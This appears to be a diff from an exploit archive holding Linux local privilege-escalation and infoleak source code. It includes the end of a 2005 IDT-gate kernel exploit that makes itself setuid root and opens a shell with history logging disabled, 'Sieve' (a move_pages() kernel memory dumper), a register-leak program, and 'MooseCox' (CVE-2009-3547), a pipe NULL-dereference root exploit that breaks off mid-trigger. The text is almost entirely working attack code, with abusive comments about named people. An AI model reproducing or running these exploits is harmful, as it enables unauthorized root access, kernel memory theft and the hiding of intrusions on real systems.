char *bashenvp[] = { "TERM=linux", "PS1=[\\u@"KRADPS1" \\W]\\$ ", "BASH_HISTORY=/dev/null",
"HISTORY=/dev/null", "history=/dev/null","HISTFILE=/dev/null",
"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL };
static int
exploit(unsigned kernelbase, int npages)
{
struct idt *idt;
struct idtr idtr;
signal(SIGSEGV, error);
signal(SIGBUS, error);
/* get idt descriptor addr */
asm ("sidt %0" : "=m" (idtr));
/*
* if OS in vmware , idtr.base is not right,please fix it
* [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table
* c0461000 D idt_table
* //idtr.base = 0xc0461000;
*/
printf("[+] idtr.base %p ,base %p\n",(void *)idtr.base , (void *)kernelbase);
if ( !definePAE )
{
map_pte(kernelbase, npages, idtr.base - kernelbase);
// idt = pae?(void *)MAP_PAE:(void *)MAP;
idt = (struct idt *)MAP;
}else
{
/* TODO: pse disable case */
if ( !havepse)
printf("[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\n");
map_pme(kernelbase, npages, idtr.base - kernelbase);
idt = (struct idt *) idtr.base;
}
#if 0
int * p = (int *) idt;
int i;
for (i=0;i<1024;i++,p++)
printf( "* %p 0x%x\n",p,*p);
fflush(stdout);
#endif
/**
* cleanup the stuff to prevent others spotting the gate
* - must be done from ring 0
*/
clear1 = (void *) &idt[0x7f];
printf("[+] idt[0x7f] addr %p\n",clear1);
if ( exploitway == 0)
{
SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode));
}
else
{
SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub));
}
//[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub));
/**
* also can use [2] stub function,but it may cause this message
*
* Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531
* Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1
* Sep 11 13:11:59 AD4 kernel: [<c011ca30>] __might_sleep+0x7d/0x89
* Sep 11 13:11:59 AD4 kernel: [<c01270bd>] sys_capget+0x1d5/0x216
* Sep 11 13:11:59 AD4 kernel: [<c0301bfb>] syscall_call+0x7/0xb
* Sep 11 13:11:59 AD4 kernel: [<c017007b>] pipe_writev+0x24/0x320
* Sep 11 13:11:59 AD4 kernel: [<c01619a4>] filp_close+0x59/0x5f
*
*/
/* call raise_cap or kernel */
asm ("int $0x7f");
printf(KRADP "j00 1u(k7 k1d!\n");
setresuid(0, 0, 0);
setresgid(0, 0, 0);
char cmdbuf[1024];
snprintf(cmdbuf,1024,"chown root %s;chmod +s %s",progargv0,progargv0);
system(cmdbuf);
execve("/bin/sh", bashargv, bashenvp);
exit(0);
}
static void
usage(char *n)
{
printf("\nUsage: %s\n",n);
printf("\t-s forced cpu flag pse \n");
printf("\t-a define CONFIG_X86_PAE,default none\n");
printf("\t-e <num> have two kernel code,default 0\n");
printf("\t-p <num> alloc pages(4k) ,default 1. Increase from 1 to 7\n"
"\t\tThe higher number the more likely it will crash\n");
printf("\t-t <num> default 0 \n"
"\t\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\n");
printf("\n");
_exit(1);
}
/*read /proc/cpuinfo to set havepse*/
static void
read_proc(void)
{
FILE * fp;
char * line = NULL;
size_t len = 0;
ssize_t read;
printf("[+] try open /proc/cpuinfo ..");
fp = fopen("/proc/cpuinfo", "r");
if (fp == NULL)
{
printf(" failed!!\n");
return;
}
printf(" ok!!\n");
int cpus = 0;
int pse = 0;
while ((read = getline(&line, &len, fp)) != -1)
{
if (strstr(line,"flags"))
{
if(strstr(line ,"pse "))
{
pse ++;
}
}
}
fclose(fp);
if (line)
free(line);
if ( pse )
{
printf("[+] find cpu flag pse in /proc/cpuinfo\n");
havepse = 1;
}
return ;
}
static void
get_config(int ac, char **av)
{
uid = getuid();
progargv0 = av[0];
int r;
while(ac) {
r = getopt(ac, av, "e:p:t:ash");
if(r<0) break;
switch(r) {
case 's' :
//pse
havepse = 1;
break;
case 'a' :
//define CONFIG_X86_PAE
definePAE = 1;
break;
case 'e' :
exploitway = atoi(optarg);
if(exploitway<0) fatal("bad exploitway value");
break;
case 'p' :
npages = atoi(optarg);
break;
case 't' :
thread_size = atoi(optarg);
break;
case 'h' :
default:
usage(av[0]);
break;
}
}
THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192);
read_proc();
}
static void
print_config(unsigned long kernebase)
{
printf("[+] CONFIG_X86_PAE :%s\n", definePAE ?"ok":"none");
printf("[+] Cpu flag: pse %s\n", havepse ?"ok":"none");
printf("[+] Exploit Way : %d\n", exploitway);
printf("[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\n",
npages,kernebase,kernebase+npages*4 kB);
printf("[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \n",thread_size);
fflush(stdout);
}
void prepare(void)
{
if (geteuid() == 0)
{
setresuid(0, 0, 0);
setresgid(0, 0, 0);
execve("/bin/sh", bashargv, bashenvp);
fatal("[-] Unable to spawn shell");
}
}
int
main(int argc, char **argv)
{
char eater[65536];
unsigned long kernelbase;
/* unlink(argv[0]); */
// sync();
printf(KRS " "KRADPS1" - <=linux 2.6.11 CPL 0 kernel exploit " KRE "\n"
KRS "Discovered Jan 2005 by sd <sd@fucksheep.org>" KRE "\n"
KRS "Modified 2005/9 by alert7 <alert7@xfocus.org>" KRE "\n");
if ( (unsigned long)eater > 0xc0000000)
{
printf("[!Waring!] TODO:use stack > 0xc0000000 \n");
return 0;
}
prepare();
get_config(argc,argv);
kernelbase =(unsigned long)eater ;
kernelbase +=0x0fffffff;
kernelbase &=0xf0000000;
print_config(kernelbase);
exploit(kernelbase, npages<0?-npages:npages);
return 0;
}
// milw0rm.com [2005-12-30]

323
platforms/linux/local/40810.c Executable file
View file

@ -0,0 +1,323 @@
/* sieve (because the Linux kernel leaks like one, get it?)
Bug NOT discovered by Marcus Meissner of SuSE security
This bug was discovered by Ramon de Carvalho Valle in September of 2009
The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS
for the bug (but had forgotten about it until now)
Ramon's report was sent to Novell's internal bugzilla, upon which
some months later Marcus took credit for discovering someone else's bug
Maybe he thought he could get away with it ;) Almost ;)
greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle!
first exploit of 2010, next one will be for a bugclass that has
afaik never been exploited on Linux before
note that this bug can also cause a DoS like so:
Unable to handle kernel paging request at ffffffff833c3be8 RIP:
[<ffffffff800dc8ac>] new_page_node+0x31/0x48
PGD 203067 PUD 205063 PMD 0
Oops: 0000 [1] SMP
Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1
RIP: 0010:[<ffffffff800dc8ac>] [<ffffffff800dc8ac>]
new_page_node+0x31/0x48
RSP: 0018:ffff8100a3c6de50 EFLAGS: 00010246
RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013
RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2
RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c
R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018
R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28
FS: 00002b8481125810(0000) GS:ffffffff803c0000(0000)
knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0
Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task
ffff81009d8c4080)
Stack: ffffffff800dd008 ffffc20000077000 ffffffff800dc87b
0000000000000000
0000000000000000 0000000000000003 ffff810092c23800 0000000000000003
00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000
Call Trace:
[<ffffffff800dd008>] migrate_pages+0x8d/0x42b
[<ffffffff800dc87b>] new_page_node+0x0/0x48
[<ffffffff8009cee2>] schedule_on_each_cpu+0xda/0xe8
[<ffffffff800dd8a2>] sys_move_pages+0x339/0x43d
[<ffffffff8005d28d>] tracesys+0xd5/0xe0
Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff
RIP [<ffffffff800dc8ac>] new_page_node+0x31/0x48
RSP <ffff8100a3c6de50>
CR2: ffffffff833c3be8
*/
#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"
#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)
int max_numnodes;
unsigned long node_online_map;
unsigned long node_states;
unsigned long our_base;
unsigned long totalhigh_pages;
#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif
/* random notes I took when writing this (all applying to the 64bit case):
checking in a bitmap based on node_states[2] or node_states[3]
(former if HIGHMEM is not present, latter if it is)
each node_state is of type nodemask_t, which is is a bitmap of size
MAX_NUMNODES/8
RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size
so the effective base we're working with is either node_states + 16 or
node_states + 24
on 2.6.18 it's based off node_online_map
node_isset does a test_bit based on this base
so our specfic case does: base[ourval / 8] & (1 << (ourval & 7))
all the calculations appear to be signed, so we can both index in the
negative and positive direction, based on ourval
on 64bit, this gives us a 256MB range above and below our base to grab
memory of
(by passing in a single page and a single node for each bit we want to
leak the value of, we can reconstruct entire bytes)
we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps,
subtracting their difference, and multiplying by 8
but we don't need to do this
*/
struct exploit_state *exp_state;
char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
int requires_null_page = 0;
void addr_to_nodes(unsigned long addr, int *nodes)
{
int i;
int min = 0x80000000 / 8;
int max = 0x7fffffff / 8;
if ((addr < (our_base - min)) ||
(addr > (our_base + max))) {
fprintf(stdout, "Error: Unable to dump address %p\n", addr);
exit(1);
}
for (i = 0; i < 8; i++) {
nodes[i] = ((int)(addr - our_base) << 3) | i;
}
return;
}
char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
int nodes[8];
int node;
int status;
int i;
int ret;
unsigned char tmp = 0;
addr_to_nodes(addr, (int *)&nodes);
for (i = 0; i < 8; i++) {
node = nodes[i];
ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
if (errno == ENOSYS) {
fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
exit(1);
} else if (errno != ENODEV)
tmp |= (1 << i);
}
return tmp;
}
void menu(void)
{
fprintf(stdout, "Enter your choice:\n"
" [0] Dump via symbol/address with length\n"
" [1] Dump entire range to file\n"
" [2] Quit\n");
}
int trigger(void)
{
unsigned long addr;
unsigned long addr2;
unsigned char thebyte;
unsigned char choice = 0;
char ibuf[1024];
char *p;
FILE *f;
// get lingering \n
getchar();
while (choice != '2') {
menu();
fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
choice = ibuf[0];
switch (choice) {
case '0':
fprintf(stdout, "Enter the symbol or address for the base:\n");
fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
p = strrchr((char *)&ibuf, '\n');
if (p)
*p = '\0';
addr = exp_state->get_kernel_sym(ibuf);
if (addr == 0) {
addr = strtoul(ibuf, NULL, 16);
}
if (addr == 0) {
fprintf(stdout, "Invalid symbol or address.\n");
break;
}
addr2 = 0;
while (addr2 == 0) {
fprintf(stdout, "Enter the length of bytes to read in hex:\n");
fscanf(stdin, "%x", &addr2);
// get lingering \n
getchar();
}
addr2 += addr;
fprintf(stdout, "Leaked bytes:\n");
while (addr < addr2) {
thebyte = get_byte_at_addr(addr);
printf("%02x ", thebyte);
addr++;
}
printf("\n");
break;
case '1':
addr = our_base - 0x10000000;
#ifdef __x86_64__
/*
our lower bound will cause us to access
bad addresses and cause an oops
*/
if (addr < 0xffffffff80000000)
addr = 0xffffffff80000000;
#else
if (addr < 0x80000000)
addr = 0x80000000;
else if (addr < 0xc0000000)
addr = 0xc0000000;
#endif
addr2 = our_base + 0x10000000;
f = fopen("./kernel.bin", "w");
if (f == NULL) {
fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
exit(1);
}
fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
fflush(stdout);
while (addr < addr2) {
thebyte = get_byte_at_addr(addr);
fputc(thebyte, f);
if (!(addr % (128 * 1024))) {
fprintf(stdout, ".");
fflush(stdout);
}
addr++;
}
fprintf(stdout, "done.\n");
fclose(f);
break;
case '2':
break;
}
}
return 0;
}
int prepare(unsigned char *ptr)
{
int node;
int found_gap = 0;
int i;
int ret;
int status;
totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
node_states = exp_state->get_kernel_sym("node_states");
node_online_map = exp_state->get_kernel_sym("node_online_map");
buf = malloc(4096);
/* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
which will be set for our single node -- this gives us the size of the bitmap
*/
for (i = 0; i < 512; i++) {
node = i;
ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
if (errno == ENOSYS) {
fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
exit(1);
} else if (errno == ENODEV) {
found_gap = 1;
} else if (found_gap == 1) {
max_numnodes = i;
fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
break;
}
}
if (node_online_map != 0)
our_base = node_online_map;
/* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
of each bitmap in the array our base is in the middle of
we've taken account for all this
*/
else if (node_states != 0)
our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
else {
fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
exit(1);
}
return 0;
}
int post(void)
{
return 0;
}

132
platforms/linux/local/40811.c Executable file
View file

@ -0,0 +1,132 @@
/* written by Ingo Molnar -- it's true because this comment says the exploit
was written by him!
*/
#include <stdio.h>
#include <sys/syscall.h>
unsigned int _r81;
unsigned int _r82;
unsigned int _r91;
unsigned int _r92;
unsigned int _r101;
unsigned int _r102;
unsigned int _r111;
unsigned int _r112;
unsigned int _r121;
unsigned int _r122;
unsigned int _r131;
unsigned int _r132;
unsigned int _r141;
unsigned int _r142;
unsigned int _r151;
unsigned int _r152;
int leak_it(void)
{
asm volatile (
".intel_syntax noprefix\n"
".code32\n"
"jmp label1\n"
"farcalllabel1:\n"
".code64\n"
"mov eax, r8d\n"
"shr r8, 32\n"
"mov ebx, r8d\n"
"mov ecx, r9d\n"
"shr r9, 32\n"
"mov edx, r9d\n"
"mov esi, r10d\n"
"shr r10, 32\n"
"mov edi, r10d\n"
".att_syntax noprefix\n"
"lret\n"
".intel_syntax noprefix\n"
"farcalllabel2:\n"
"mov eax, r11d\n"
"shr r11, 32\n"
"mov ebx, r11d\n"
"mov ecx, r12d\n"
"shr r12, 32\n"
"mov edx, r12d\n"
"mov esi, r13d\n"
"shr r13, 32\n"
"mov edi, r13d\n"
".att_syntax noprefix\n"
"lret\n"
".intel_syntax noprefix\n"
"farcalllabel3:\n"
"mov eax, r14d\n"
"shr r14, 32\n"
"mov ebx, r14d\n"
"mov ecx, r15d\n"
"shr r15, 32\n"
"mov edx, r15d\n"
".att_syntax noprefix\n"
"lret\n"
".intel_syntax noprefix\n"
".code32\n"
"label1:\n"
".att_syntax noprefix\n"
"lcall $0x33, $farcalllabel1\n"
".intel_syntax noprefix\n"
"mov _r81, eax\n"
"mov _r82, ebx\n"
"mov _r91, ecx\n"
"mov _r92, edx\n"
"mov _r101, esi\n"
"mov _r102, edi\n"
".att_syntax noprefix\n"
"lcall $0x33, $farcalllabel2\n"
".intel_syntax noprefix\n"
"mov _r111, eax\n"
"mov _r112, ebx\n"
"mov _r121, ecx\n"
"mov _r122, edx\n"
"mov _r131, esi\n"
"mov _r132, edi\n"
".att_syntax noprefix\n"
"lcall $0x33, $farcalllabel3\n"
".intel_syntax noprefix\n"
"mov _r141, eax\n"
"mov _r142, ebx\n"
"mov _r151, ecx\n"
"mov _r152, edx\n"
".att_syntax noprefix\n"
);
printf(" R8=%08x%08x\n", _r82, _r81);
printf(" R9=%08x%08x\n", _r92, _r91);
printf("R10=%08x%08x\n", _r102, _r101);
printf("R11=%08x%08x\n", _r112, _r111);
printf("R12=%08x%08x\n", _r122, _r121);
printf("R13=%08x%08x\n", _r132, _r131);
printf("R14=%08x%08x\n", _r142, _r141);
printf("R15=%08x%08x\n", _r152, _r151);
return 0;
}
/* ripped from jon oberheide */
const int randcalls[] = {
__NR_read, __NR_write, __NR_open, __NR_close, __NR_stat, __NR_lstat,
__NR_lseek, __NR_rt_sigaction, __NR_rt_sigprocmask, __NR_ioctl,
__NR_access, __NR_pipe, __NR_sched_yield, __NR_mremap, __NR_dup,
__NR_dup2, __NR_getitimer, __NR_setitimer, __NR_getpid, __NR_fcntl,
__NR_flock, __NR_getdents, __NR_getcwd, __NR_gettimeofday,
__NR_getrlimit, __NR_getuid, __NR_getgid, __NR_geteuid, __NR_getegid,
__NR_getppid, __NR_getpgrp, __NR_getgroups, __NR_getresuid,
__NR_getresgid, __NR_getpgid, __NR_getsid,__NR_getpriority,
__NR_sched_getparam, __NR_sched_get_priority_max
};
int main(void)
{
/* to keep random stack values from being used for pointers in syscalls */
char buf[64] = {};
int call;
for (call = 0; call < sizeof(randcalls)/sizeof(randcalls[0]); call++) {
syscall(randcalls[call]);
leak_it();
}
}

468
platforms/linux/local/40812.c Executable file
View file

@ -0,0 +1,468 @@
/* exp_moosecox.c
Watch a video of the exploit here:
http://www.youtube.com/watch?v=jt81NvaOj5Y
developed entirely by Ingo Molnar (exploit writer extraordinaire!) ,
thanks to Fotis Loukos for pointing the bug out to me -- neat bug! :)
dedicated to the Red Hat employees who get paid to copy+paste my
twitter and issue security advisories, their sweet
acknowledgement policy, and general classiness
see: https://bugzilla.redhat.com/show_activity.cgi?id=530490
"policy" aside, there's a word for what you guys are doing: "plagiarism"
in fact, i tested this one day by posting three links to twitter,
without any discussion on any of them. the same day, those three
(and only those three) links were assigned CVEs, even though two of
them weren't even security bugs (it doesn't pay to copy+paste)
official Ingo Molnar (that's me) policy for acknowledgement in
exploits requires general douche-ness or plagiarization
official policy further dictates immediate exploit release for
embargoed, patched bug
I'll be curious to see what the CVE statistics are like for the
kernel this year when they get compiled next year -- I'm predicting
that when someone's watching the sleepy watchers, a more personal
interest is taken in doing the job that you're paid to do correctly.
--------------------------------------------------------------------
Special PS note to Theo (I can do this here because I know he'll
never read it -- the guy is apparently oblivious to the entire world of
security around him -- the same world that invents the protections
years before him that he pats himself on the back for "innovating")
Seriously though, it's incredible to me that an entire team
of developers whose sole purpose is to develop a secure operating
system can be so oblivious to the rest of the world. They haven't
innovated since they replaced exploitable string copies with
exploitable string truncations 6 or so years ago.
The entire joke of a thread can be read here:
http://www.pubbs.net/openbsd/200911/4582/
"Our focus therefore is always on finding innovative ideas which make
bugs very hard to exploit succesfully."
"He's too busy watching monkey porn instead of
building researching last-year's security technology that will stop
an exploit technique that has been exploited multiple times."
"it seems that everyone else is slowly coming around to the
same solution."
So let's talk about this "innovation" of theirs with their
implementation of mmap_min_addr:
They implemented it in 2008, a year after Linux implemented it, a
year after the public phrack article on the bug class, more than a
year after my mail to dailydave with the first public Linux kernel
exploit for the bug class, and over two years after UDEREF was
implemented in PaX (providing complete protection against the smaller
subset of null ptr dereference bugs and the larger class of invalid
userland access in general).
OpenBSD had a public null pointer dereference exploit (agp_ioctl())
published for its OS in January of 2007. It took them over a year
and a half to implement the same feature that was implemented in
Linux a few months after my public exploit in 2007.
So how can it be that "everyone else is slowly coming around to the
same solution" when "everyone else" came to that solution over a
year before you Theo? In fact, I prediced this exact situation would
happen back in 2007 in my DD post:
http://lists.virus.org/dailydave-0703/msg00011.html
"Expect OpenBSD to independently invent a protection against null ptr
deref bugs sometime in 2009."
Let's talk about some more "innovation" -- position independent
executables. PaX implemented position independent executables on
Linux back in 2001 (ET_DYN). PIE binary support was added to GNU
binutils in 2003. Those OpenBSD innovators implemented PIE binaries
in 2008, 7 years after PaX. Innovation indeed!
How about their W^X/ASLR innovation? These plagiarists have the
audacity to announce on their press page:
http://www.openbsd.org/press.html
"Microsoft borrows one of OpenBSD's security features for Vista,
stack/library randomization, under the name Address Space Layout
Randomization (ASLR). "Until now, the feature has been most
prominently used in the OpenBSD Unix variant and the PaX and Exec
Shield security patches for Linux""
Borrowing one of your features? Where'd this ASLR acronym come from
anyway? Oh that's right, PaX again -- when they published the first
design and implementation of it, and coined the term, in July 2001.
It covered the heap, mmap, and stack areas.
OpenBSD implemented "stack-gap randomization" in 2003. Way to
innovate!
W^X, which is a horrible name as OpenBSD doesn't even enforce it with
mprotect restrictions like PaX did from the beginning or even SELinux
is doing now (from a 3rd party contribution modeled after PaX):
PaX implemented true per-page non-executable page support, protecting
binary data, the heap, and the stack, back in 2000.
OpenBSD implemented it in 2003, requiring a full userland rebuild.
The innovation is overwhelming!
They keep coming up with the same exact "innovations" others came up
with years before them. Their official explanation for where they
got the W^X/ASLR ideas was a drunk guy came into their tent at one of
their hack-a-thons and started talking about the idea. They had
never heard of PaX when we asked them in 2003. Which makes the
following involuntarily contributed private ICB logs from Phrack #66
(Internet Citizen's Band -- OpenBSD internal chat network) so intriguing:
On some sunny day in July 2002 (t: Theo de Raadt):
<cloder> why can't you just randomize the base
<cloder> that's what PaX does
<t> You've not been paying attention to what art's saying, or you don't
understand yet, either case is one of think it through yourself.
<cloder> whatever
Only to see poetic justice in August 2003 (ttt: Theo again):
<miod> more exactly, we heard of pax when they started bitching
<ttt> miod, that was very well spoken.
That wraps up our OpenBSD history lesson, in case anyone forgot it.
PS -- enjoy that null ptr deref exploit just released for OpenBSD.
--------------------------------------------------------------------
Important final exploit notes:
don't forget to inspect /boot/config* to see if PREEMPT, LOCKBREAK,
or DEBUG_SPINLOCK are enabled and modify the structures below
accordingly -- a fancier exploit would do this automatically
I've broken the 2.4->2.6.10 version of the exploit and would like to see
someone fix it ;) See below for more comments on this.
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sched.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/utsname.h>
#include "exp_framework.h"
int pipefd[2];
struct exploit_state *exp_state;
int is_old_kernel = 0;
int go_go_speed_racer(void *unused)
{
int ret;
while(!exp_state->got_ring0) {
/* bust spinlock */
*(unsigned int *)NULL = is_old_kernel ? 0 : 1;
ret = pipe(pipefd);
if (!ret) {
close(pipefd[0]);
close(pipefd[1]);
}
}
return 0;
}
/* <3 twiz/sgrakkyu */
int start_thread(int (*f)(void *), void *arg)
{
char *stack = malloc(0x4000);
int tid = clone(f, stack + 0x4000 - sizeof(unsigned long), CLONE_FS|CLONE_FILES|CLONE_SIGHAND|CLONE_VM, arg);
if (tid < 0) {
printf("can't create thread\n");
exit(1);
}
sleep(1);
return tid;
}
char *desc = "MooseCox: Linux <= 2.6.31.5 pipe local root";
char *cve = "CVE-2009-3547";
#define PIPE_BUFFERS 16
/* this changes on older kernels, but it doesn't matter to our method */
struct pipe_buf_operations {
int can_merge;
void *map;
void *unmap;
void *confirm;
void *release;
void *steal;
void *get;
};
struct pipe_buffer2620ornewer {
void *page;
unsigned int offset, len;
void *ops;
unsigned int flags;
unsigned long private;
};
struct pipe_buffer2619orolder {
void *page;
unsigned int offset, len;
void *ops;
unsigned int flags;
};
struct pipe_buffer2616orolder {
void *page;
unsigned int offset, len;
void *ops;
};
struct pipe_inode_info2620ornewer {
unsigned int spinlock;
/*
// LOCKBREAK
unsigned int break_lock;
// DEBUG_SPINLOCK
unsigned int magic, owner_cpu;
void *owner;
*/
void *next, *prev;
unsigned int nrbufs, curbuf;
void *tmp_page;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
void *fasync_readers;
void *fasync_writers;
void *inode;
struct pipe_buffer2620ornewer bufs[PIPE_BUFFERS];
};
struct pipe_inode_info2619orolder {
unsigned int spinlock;
/*
// if PREEMPT enabled
unsigned int break_lock;
// DEBUG_SPINLOCK
unsigned int magic, owner_cpu;
void *owner;
*/
void *next, *prev;
unsigned int nrbufs, curbuf;
struct pipe_buffer2619orolder bufs[PIPE_BUFFERS];
void *tmp_page;
unsigned int start;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
void *fasync_readers;
void *fasync_writers;
void *inode;
};
struct pipe_inode_info2616orolder {
unsigned int spinlock;
/*
// if PREEMPT enabled
unsigned int break_lock;
// DEBUG_SPINLOCK
unsigned int magic, owner_cpu;
*/
void *owner;
void *next, *prev;
unsigned int nrbufs, curbuf;
struct pipe_buffer2616orolder bufs[PIPE_BUFFERS];
void *tmp_page;
unsigned int start;
unsigned int readers;
unsigned int writers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
void *fasync_readers;
void *fasync_writers;
};
struct fasync_struct {
int magic;
int fa_fd;
struct fasync_struct *fa_next;
void *file;
};
struct pipe_inode_info2610orolder {
/* this includes 2.4 kernels */
unsigned long lock; // can be rw or spin
void *next, *prev;
char *base;
unsigned int len;
unsigned int start;
unsigned int readers;
unsigned int writers;
/* 2.4 only */
unsigned int waiting_readers;
unsigned int waiting_writers;
unsigned int r_counter;
unsigned int w_counter;
/* 2.6 only */
struct fasync_struct *fasync_readers;
struct fasync_struct *fasync_writers;
};
int prepare(unsigned char *buf)
{
struct pipe_inode_info2610orolder *info_oldest = (struct pipe_inode_info2610orolder *)buf;
struct pipe_inode_info2616orolder *info_older = (struct pipe_inode_info2616orolder *)buf;
struct pipe_inode_info2619orolder *info_old = (struct pipe_inode_info2619orolder *)buf;
struct pipe_inode_info2620ornewer *info_new = (struct pipe_inode_info2620ornewer *)buf;
struct pipe_buf_operations *ops = (struct pipe_buf_operations *)0x800;
int i;
int newver;
struct utsname unm;
i = uname(&unm);
if (i != 0) {
printf("unable to get kernel version\n");
exit(1);
}
if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '2' && unm.release[5] >= '0' && unm.release[5] <= '9') {
fprintf(stdout, " [+] Using newer pipe_inode_info layout\n");
newver = 3;
} else if (strlen(unm.release) >= 6 && unm.release[2] == '6' && unm.release[4] >= '1' && unm.release[5] >= '7' && unm.release[5] <= '9') {
fprintf(stdout, " [+] Using older pipe_inode_info layout\n");
newver = 2;
} else if (strlen(unm.release) >= 5 && unm.release[2] == '6') {
fprintf(stdout, " [+] Using older-er pipe_inode_info layout\n");
newver = 1;
// } else if (strlen(unm.release) >= 5 && unm.release[2] >= '4') {
// is_old_kernel = 1;
// newver = 0;
} else {
fprintf(stdout, " [+] This kernel is still vulnerable, but I can't be bothered to write the exploit. Write it yourself.\n");
exit(1);
}
/* for most of these what will happen is our write will
cause ops->confirm(/pin) to be called, which we've replaced
with own_the_kernel
for the 2.6.10->2.6.16 case it has no confirm/pin op, so what gets
called instead (repeatedly) is the release op
*/
if (newver == 3) {
/* uncomment for DEBUG_SPINLOCK */
//info_new->magic = 0xdead4ead;
/* makes list_head empty for wake_up_common */
info_new->next = &info_new->next;
info_new->readers = 1;
info_new->writers = 1;
info_new->nrbufs = 1;
info_new->curbuf = 1;
for (i = 0; i < PIPE_BUFFERS; i++)
info_new->bufs[i].ops = (void *)ops;
} else if (newver == 2) {
/* uncomment for DEBUG_SPINLOCK */
//info_old->magic = 0xdead4ead;
/* makes list_head empty for wake_up_common */
info_old->next = &info_old->next;
info_old->readers = 1;
info_old->writers = 1;
info_old->nrbufs = 1;
info_old->curbuf = 1;
for (i = 0; i < PIPE_BUFFERS; i++)
info_old->bufs[i].ops = (void *)ops;
} else if (newver == 1) {
/* uncomment for DEBUG_SPINLOCK */
//info_older->magic = 0xdead4ead;
/* makes list_head empty for wake_up_common */
info_older->next = &info_older->next;
info_older->readers = 1;
info_older->writers = 1;
info_older->nrbufs = 1;
info_older->curbuf = 1;
/* we'll get called multiple times from free_pipe_info
but it's ok because own_the_kernel handles this case
*/
for (i = 0; i < PIPE_BUFFERS; i++)
info_older->bufs[i].ops = (void *)ops;
} else {
/*
different ballgame here, instead of being able to
provide a function pointer in the ops table, you
control a base address used to compute the address for
a copy into the kernel via copy_from_user. The
following should get you started.
*/
/* lookup symbol for writable fptr then trigger it later
change the main write in the one thread to write out
pointers with the value of exp_state->exploit_kernel
*/
info_oldest->base = (char *)0xc8000000;
info_oldest->readers = 1;
info_oldest->writers = 1;
return 0;
}
ops->can_merge = 1;
for (i = 0; i < 16; i++)
((void **)&ops->map)[i] = exp_state->own_the_kernel;
return 0;
}
int requires_null_page = 1;
int get_exploit_state_ptr(struct exploit_state *ptr)
{
exp_state = ptr;
return 0;
}
int trigger(void)
{
char buf[128];
int fd;
int i = 0;
/* ignore sigpipe so we don't bail out early */
signal(SIGPIPE, SIG_IGN);
start_thread(go_go_speed_racer, NULL);
fprintf(stdout, " [+] We'll let this go for a while if needed...\n");
fflush(stdout);
while (!exp_state->got_ring0 && i < 10000000) {
fd = pipefd[1];
sprintf(buf, "/proc/self/fd/%d", fd);
fd = open(buf, O_WRONLY | O_NONBLOCK);
if (fd >= 0) {
/* bust spinlock */
*(unsigned int *)NULL = is_old_kernel ? 0 : 1;
write(fd, ".", 1);
close(fd);
}
i++;
}
